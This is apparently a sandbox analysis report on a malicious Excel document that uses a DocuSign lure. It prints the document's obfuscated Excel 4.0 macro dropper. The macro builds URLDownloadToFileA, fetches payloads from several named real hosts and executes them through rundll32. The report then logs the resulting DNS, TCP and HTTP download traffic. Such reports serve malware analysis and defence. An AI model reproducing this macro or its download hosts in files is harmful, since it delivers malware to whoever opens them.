                                                                                                                                                ,,,,,,,,,,"=RIGHT(""dfrgbrd4567w547547w7b,DllRegister"",12)&T26",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&T19,40))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""1""&T19,41))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""2""&T19,41))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""3""&T19,41))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""4""&T19,41))",,,=HALT(),,,,,,,,,,,
                                                                                                                                                ,,,Server,,,,,,,,,,,,,,,,=NOW(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=FORMULA.FILL(D129,DocuSign!T26)",,,,,,,,,,,,,,,,,,,"=FORMULA.FILL(A130*1000000000000000,B133)",,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""ghydbetrf46et5eb645bv7ea45istbsebtuRlMon"",6)",,,,,,,,,,,,,,,,,,,"=RIGHT(""45bh4g5nuwyftneragntrnrfaktsgbutnrkltgrkbownloadToFileA"",14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(D134,""URLD""&D135,""JJCCBB"",""BIOLAFE"",,1,9)",,,,,,,,,,,,,,,,,,,http://"=BIOLAFE(0,T137&B138&B133&D145&D146&D147&D148,D141,0,0)",rzminc.com/xklyulyijvn/,,,,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B139&B133&D145&D146&D147&D148,D141&""1"",0,0)",pathinanchilearthmovers.com/eznwcdhx/,,"=RIGHT(""hiuhnUBGYGBYnt7t67tb67rIftfFFDFFDTbtrdrtdgjcndll32"",6)",,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B140&B133&D145&D146&D147&D148,D141&""2"",0,0)",jugueterialatorre.com.ar/xjzpfwc/,,,,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B141&B133&D145&D146&D147&D148,D141&""3"",0,0)",rzminc.com/fdzgprclatqo/,,"=RIGHT(""nnhjgbgvdvgekvnrtve6reb6tn6rdtryt6smy65ty56s445nr6x..\JDFR.hdfgr"",13)",,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B142&B133&D145&D146&D147&D148,D141&""4"",0,0)",biblicalisraeltours.com/otmchxmxeg/,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,d,,,,,,,,,,,,,,,,,,,a,,,,,,,,,,,,,,,,,,,t,,,,,,,,,,,,,,,,=GOTO(DocuSign!T3),,,,,,,,,,,,,,,,,,,

                                                                                                                                                Network Behavior

                                                                                                                                                Network Port Distribution

                                                                                                                                                TCP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Feb 23, 2021 14:25:52.868345022 CET4973080192.168.2.472.52.227.180
                                                                                                                                                Feb 23, 2021 14:25:53.024216890 CET804973072.52.227.180192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:53.024317026 CET4973080192.168.2.472.52.227.180
                                                                                                                                                Feb 23, 2021 14:25:53.024821997 CET4973080192.168.2.472.52.227.180
                                                                                                                                                Feb 23, 2021 14:25:53.180587053 CET804973072.52.227.180192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:53.485604048 CET804973072.52.227.180192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:53.485677958 CET4973080192.168.2.472.52.227.180
                                                                                                                                                Feb 23, 2021 14:25:53.485748053 CET804973072.52.227.180192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:53.485800028 CET4973080192.168.2.472.52.227.180
                                                                                                                                                Feb 23, 2021 14:25:53.487128019 CET4973080192.168.2.472.52.227.180
                                                                                                                                                Feb 23, 2021 14:25:53.645163059 CET804973072.52.227.180192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:53.698911905 CET4973280192.168.2.4162.241.80.6
                                                                                                                                                Feb 23, 2021 14:25:53.865453005 CET8049732162.241.80.6192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:53.865612030 CET4973280192.168.2.4162.241.80.6
                                                                                                                                                Feb 23, 2021 14:25:53.866291046 CET4973280192.168.2.4162.241.80.6
                                                                                                                                                Feb 23, 2021 14:25:54.023978949 CET8049732162.241.80.6192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:54.569462061 CET8049732162.241.80.6192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:54.569523096 CET4973280192.168.2.4162.241.80.6
                                                                                                                                                Feb 23, 2021 14:25:54.894741058 CET4973480192.168.2.4138.36.237.100
                                                                                                                                                Feb 23, 2021 14:25:55.179120064 CET8049734138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:55.179322958 CET4973480192.168.2.4138.36.237.100
                                                                                                                                                Feb 23, 2021 14:25:55.179770947 CET4973480192.168.2.4138.36.237.100
                                                                                                                                                Feb 23, 2021 14:25:55.469976902 CET8049734138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:56.756165028 CET8049734138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:56.756186962 CET8049734138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:56.756371975 CET4973480192.168.2.4138.36.237.100
                                                                                                                                                Feb 23, 2021 14:25:56.763923883 CET49737443192.168.2.4138.36.237.100
                                                                                                                                                Feb 23, 2021 14:25:57.049062014 CET44349737138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:57.049289942 CET49737443192.168.2.4138.36.237.100
                                                                                                                                                Feb 23, 2021 14:25:57.050266981 CET49737443192.168.2.4138.36.237.100
                                                                                                                                                Feb 23, 2021 14:25:57.337471008 CET44349737138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:57.338987112 CET44349737138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:57.339107037 CET49737443192.168.2.4138.36.237.100
                                                                                                                                                Feb 23, 2021 14:25:57.339162111 CET44349737138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:57.339196920 CET44349737138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:57.339260101 CET49737443192.168.2.4138.36.237.100
                                                                                                                                                Feb 23, 2021 14:25:57.785151005 CET4973880192.168.2.491.199.212.52
                                                                                                                                                Feb 23, 2021 14:25:57.848018885 CET804973891.199.212.52192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:57.848191977 CET4973880192.168.2.491.199.212.52
                                                                                                                                                Feb 23, 2021 14:25:57.848548889 CET4973880192.168.2.491.199.212.52
                                                                                                                                                Feb 23, 2021 14:25:57.911484957 CET804973891.199.212.52192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:57.911541939 CET804973891.199.212.52192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:57.911576986 CET804973891.199.212.52192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:57.911649942 CET4973880192.168.2.491.199.212.52
                                                                                                                                                Feb 23, 2021 14:25:57.926559925 CET49737443192.168.2.4138.36.237.100
                                                                                                                                                Feb 23, 2021 14:25:58.212116957 CET44349737138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:58.212212086 CET49737443192.168.2.4138.36.237.100
                                                                                                                                                Feb 23, 2021 14:25:58.213407040 CET49737443192.168.2.4138.36.237.100
                                                                                                                                                Feb 23, 2021 14:25:58.626422882 CET44349737138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:59.570209026 CET8049732162.241.80.6192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:59.575273037 CET4973280192.168.2.4162.241.80.6
                                                                                                                                                Feb 23, 2021 14:26:01.757095098 CET8049734138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:01.757244110 CET4973480192.168.2.4138.36.237.100
                                                                                                                                                Feb 23, 2021 14:26:02.486850023 CET44349737138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:02.486881971 CET44349737138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:02.486900091 CET44349737138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:02.486916065 CET44349737138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:02.486932993 CET44349737138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:02.486952066 CET44349737138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:02.486968994 CET44349737138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:02.486984968 CET44349737138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:02.487000942 CET44349737138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:02.487041950 CET49737443192.168.2.4138.36.237.100
                                                                                                                                                Feb 23, 2021 14:26:02.487061024 CET44349737138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:02.487129927 CET49737443192.168.2.4138.36.237.100
                                                                                                                                                Feb 23, 2021 14:26:02.489072084 CET49737443192.168.2.4138.36.237.100
                                                                                                                                                Feb 23, 2021 14:26:02.489135027 CET49737443192.168.2.4138.36.237.100
                                                                                                                                                Feb 23, 2021 14:26:02.497642040 CET4974380192.168.2.472.52.227.180
                                                                                                                                                Feb 23, 2021 14:26:02.658185005 CET804974372.52.227.180192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:02.658401966 CET4974380192.168.2.472.52.227.180
                                                                                                                                                Feb 23, 2021 14:26:02.659064054 CET4974380192.168.2.472.52.227.180
                                                                                                                                                Feb 23, 2021 14:26:02.772351027 CET44349737138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:02.772422075 CET44349737138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:02.772463083 CET44349737138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:02.772515059 CET44349737138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:02.772578001 CET44349737138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:02.772579908 CET49737443192.168.2.4138.36.237.100
                                                                                                                                                Feb 23, 2021 14:26:02.772624969 CET49737443192.168.2.4138.36.237.100
                                                                                                                                                Feb 23, 2021 14:26:02.772631884 CET49737443192.168.2.4138.36.237.100
                                                                                                                                                Feb 23, 2021 14:26:02.772636890 CET49737443192.168.2.4138.36.237.100
                                                                                                                                                Feb 23, 2021 14:26:02.772645950 CET44349737138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:02.772701979 CET44349737138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:02.772711992 CET49737443192.168.2.4138.36.237.100
                                                                                                                                                Feb 23, 2021 14:26:02.772754908 CET44349737138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:02.772761106 CET49737443192.168.2.4138.36.237.100
                                                                                                                                                Feb 23, 2021 14:26:02.772810936 CET49737443192.168.2.4138.36.237.100
                                                                                                                                                Feb 23, 2021 14:26:02.772813082 CET44349737138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:02.772865057 CET44349737138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:02.772866011 CET49737443192.168.2.4138.36.237.100
                                                                                                                                                Feb 23, 2021 14:26:02.772917986 CET49737443192.168.2.4138.36.237.100
                                                                                                                                                Feb 23, 2021 14:26:02.772917986 CET44349737138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:02.772969007 CET44349737138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:02.772972107 CET49737443192.168.2.4138.36.237.100
                                                                                                                                                Feb 23, 2021 14:26:02.773021936 CET49737443192.168.2.4138.36.237.100
                                                                                                                                                Feb 23, 2021 14:26:02.773024082 CET44349737138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:02.773080111 CET49737443192.168.2.4138.36.237.100
                                                                                                                                                Feb 23, 2021 14:26:02.773083925 CET44349737138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:02.773138046 CET49737443192.168.2.4138.36.237.100
                                                                                                                                                Feb 23, 2021 14:26:02.773140907 CET44349737138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:02.773191929 CET49737443192.168.2.4138.36.237.100
                                                                                                                                                Feb 23, 2021 14:26:02.773195028 CET44349737138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:02.773246050 CET44349737138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:02.773248911 CET49737443192.168.2.4138.36.237.100
                                                                                                                                                Feb 23, 2021 14:26:02.773298025 CET49737443192.168.2.4138.36.237.100
                                                                                                                                                Feb 23, 2021 14:26:02.773299932 CET44349737138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:02.773350000 CET44349737138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:02.773350954 CET49737443192.168.2.4138.36.237.100
                                                                                                                                                Feb 23, 2021 14:26:02.773415089 CET49737443192.168.2.4138.36.237.100
                                                                                                                                                Feb 23, 2021 14:26:02.773441076 CET44349737138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:02.773504019 CET49737443192.168.2.4138.36.237.100
                                                                                                                                                Feb 23, 2021 14:26:02.819442034 CET804974372.52.227.180192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:03.122876883 CET804974372.52.227.180192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:03.122937918 CET804974372.52.227.180192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:03.123085976 CET4974380192.168.2.472.52.227.180
                                                                                                                                                Feb 23, 2021 14:26:03.123642921 CET4974380192.168.2.472.52.227.180
                                                                                                                                                Feb 23, 2021 14:26:03.284308910 CET804974372.52.227.180192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:29.570221901 CET8049732162.241.80.6192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:31.756675959 CET8049734138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:27:02.912409067 CET804973891.199.212.52192.168.2.4
                                                                                                                                                Feb 23, 2021 14:27:02.912514925 CET4973880192.168.2.491.199.212.52
                                                                                                                                                Feb 23, 2021 14:27:02.912652969 CET4973880192.168.2.491.199.212.52
                                                                                                                                                Feb 23, 2021 14:27:02.973691940 CET804973891.199.212.52192.168.2.4

                                                                                                                                                UDP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Feb 23, 2021 14:25:35.948244095 CET5372353192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:25:35.997133017 CET53537238.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:36.241441965 CET6464653192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:25:36.290787935 CET53646468.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:36.497275114 CET6529853192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:25:36.546272039 CET53652988.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:39.484381914 CET5912353192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:25:39.543113947 CET53591238.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:39.807583094 CET5453153192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:25:39.858936071 CET53545318.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:41.176209927 CET4971453192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:25:41.225099087 CET53497148.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:42.647861004 CET5802853192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:25:42.696520090 CET53580288.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:47.697901011 CET5309753192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:25:47.757951975 CET53530978.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:49.008389950 CET4925753192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:25:49.067048073 CET53492578.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:49.500225067 CET6238953192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:25:49.563935041 CET53623898.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:49.968599081 CET4991053192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:25:50.017833948 CET53499108.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:50.516366005 CET6238953192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:25:50.578011036 CET53623898.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:51.530107975 CET6238953192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:25:51.590218067 CET53623898.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:52.664776087 CET5585453192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:25:52.865950108 CET53558548.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:52.880219936 CET6454953192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:25:52.931766987 CET53645498.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:53.498677969 CET6315353192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:25:53.545864105 CET6238953192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:25:53.607526064 CET53623898.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:53.696513891 CET53631538.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:54.131462097 CET5299153192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:25:54.180557013 CET53529918.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:54.586744070 CET5370053192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:25:54.891293049 CET53537008.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:55.344700098 CET5172653192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:25:55.404779911 CET53517268.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:56.220449924 CET5679453192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:25:56.278127909 CET53567948.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:57.660541058 CET6238953192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:25:57.720671892 CET53623898.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:57.734325886 CET5653453192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:25:57.783886909 CET53565348.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:57.804344893 CET5662753192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:25:57.858009100 CET53566278.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:25:58.767709970 CET5662153192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:25:58.818391085 CET53566218.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:00.426373005 CET6311653192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:26:00.475431919 CET53631168.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:01.229185104 CET6407853192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:26:01.280988932 CET53640788.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:06.376871109 CET6480153192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:26:06.425924063 CET53648018.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:10.043467045 CET6172153192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:26:10.092130899 CET53617218.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:20.651405096 CET5125553192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:26:20.703030109 CET53512558.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:21.851123095 CET6152253192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:26:21.904052973 CET53615228.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:23.201653004 CET5233753192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:26:23.253521919 CET53523378.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:24.495584965 CET5504653192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:26:24.544322014 CET53550468.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:25.387270927 CET4961253192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:26:25.435830116 CET53496128.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:26.181955099 CET4928553192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:26:26.231391907 CET53492858.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:31.689260006 CET5060153192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:26:31.739661932 CET53506018.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:32.445811987 CET6087553192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:26:32.538589954 CET53608758.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:33.030227900 CET5644853192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:26:33.091103077 CET53564488.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:33.660463095 CET5917253192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:26:33.710828066 CET53591728.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:34.139489889 CET6242053192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:26:34.211030006 CET53624208.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:34.353008986 CET6057953192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:26:34.401853085 CET53605798.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:35.403145075 CET5018353192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:26:35.486800909 CET53501838.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:37.610733032 CET6153153192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:26:37.667984962 CET53615318.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:38.207225084 CET4922853192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:26:38.264324903 CET53492288.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:39.008949041 CET5979453192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:26:39.066279888 CET53597948.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:39.966912031 CET5591653192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:26:40.024174929 CET53559168.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:40.486193895 CET5275253192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:26:40.549102068 CET53527528.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:49.305099010 CET6054253192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:26:49.363445997 CET53605428.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:27:19.136259079 CET6068953192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:27:19.185045958 CET53606898.8.8.8192.168.2.4
                                                                                                                                                Feb 23, 2021 14:27:20.369985104 CET6420653192.168.2.48.8.8.8
                                                                                                                                                Feb 23, 2021 14:27:20.442787886 CET53642068.8.8.8192.168.2.4

                                                                                                                                                DNS Queries

                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                Feb 23, 2021 14:25:52.664776087 CET192.168.2.48.8.8.80x838bStandard query (0)rzminc.comA (IP address)IN (0x0001)
                                                                                                                                                Feb 23, 2021 14:25:53.498677969 CET192.168.2.48.8.8.80x50ecStandard query (0)pathinanchilearthmovers.comA (IP address)IN (0x0001)
                                                                                                                                                Feb 23, 2021 14:25:54.586744070 CET192.168.2.48.8.8.80x46dfStandard query (0)jugueterialatorre.com.arA (IP address)IN (0x0001)
                                                                                                                                                Feb 23, 2021 14:25:57.734325886 CET192.168.2.48.8.8.80x8b5aStandard query (0)crt.sectigo.comA (IP address)IN (0x0001)

                                                                                                                                                DNS Answers

                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                Feb 23, 2021 14:25:52.865950108 CET8.8.8.8192.168.2.40x838bNo error (0)rzminc.com72.52.227.180A (IP address)IN (0x0001)
                                                                                                                                                Feb 23, 2021 14:25:53.696513891 CET8.8.8.8192.168.2.40x50ecNo error (0)pathinanchilearthmovers.com162.241.80.6A (IP address)IN (0x0001)
                                                                                                                                                Feb 23, 2021 14:25:54.891293049 CET8.8.8.8192.168.2.40x46dfNo error (0)jugueterialatorre.com.ar138.36.237.100A (IP address)IN (0x0001)
                                                                                                                                                Feb 23, 2021 14:25:57.783886909 CET8.8.8.8192.168.2.40x8b5aNo error (0)crt.sectigo.com91.199.212.52A (IP address)IN (0x0001)

                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                • rzminc.com
                                                                                                                                                • pathinanchilearthmovers.com
                                                                                                                                                • jugueterialatorre.com.ar
                                                                                                                                                • crt.sectigo.com

                                                                                                                                                HTTP Packets

                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                0192.168.2.44973072.52.227.18080C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 23, 2021 14:25:53.024821997 CET2534OUTGET /xklyulyijvn/44250601302777800000.dat HTTP/1.1
                                                                                                                                                Accept: */*
                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                Host: rzminc.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Feb 23, 2021 14:25:53.485604048 CET2589INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 23 Feb 2021 13:25:53 GMT
                                                                                                                                                Server: Apache/2.4.46 (CentOS)
                                                                                                                                                X-Powered-By: PHP/7.3.27
                                                                                                                                                Upgrade: h2
                                                                                                                                                Connection: keep-alive, close
                                                                                                                                                Cache-Control: private, must-revalidate
                                                                                                                                                Expires: Tue, 23 Feb 2021 13:25:53 GMT
                                                                                                                                                Content-Length: 0
                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                1192.168.2.449732162.241.80.680C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 23, 2021 14:25:53.866291046 CET2951OUTGET /eznwcdhx/44250601302777800000.dat HTTP/1.1
                                                                                                                                                Accept: */*
                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
